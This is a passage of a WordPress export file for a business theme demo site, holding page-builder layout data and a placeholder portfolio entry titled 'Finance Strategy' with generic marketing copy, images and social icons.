costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5a688754","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8f83c9f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6eea0e82","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=842</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>842</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-strategy]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3c1bcc97","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"269995a","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5abe166e","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1f4595df","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"3738a3a7","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"2a6a10f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"17d6ef46","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3ad8441","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4c261373","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"71428679","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1e56f55c","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"4a101bc2","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"344e5a57","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"31ba8a7c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"618b4571","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d286c1c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"772279c4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"683bd9c1","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"db39480","elType":"section","settings":[],"elements":[{"id":"ab5521e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"f5c2df0","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d70f751","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"84692d4","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"abf755f","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f5dea1b","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1c687e8","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"fcb2f42","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"502e216","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2a8d870","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"85c6f9f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"20eb0d1","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"f7971ea","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"45ecc92","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"083eb57","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"74b5687","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"0fe550e","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"afd1a1a","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5d91ddf","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"33607f8","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"82649fd","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1c18255","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e0c5c8f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"cfefb66","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1220]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[844]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_w]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layo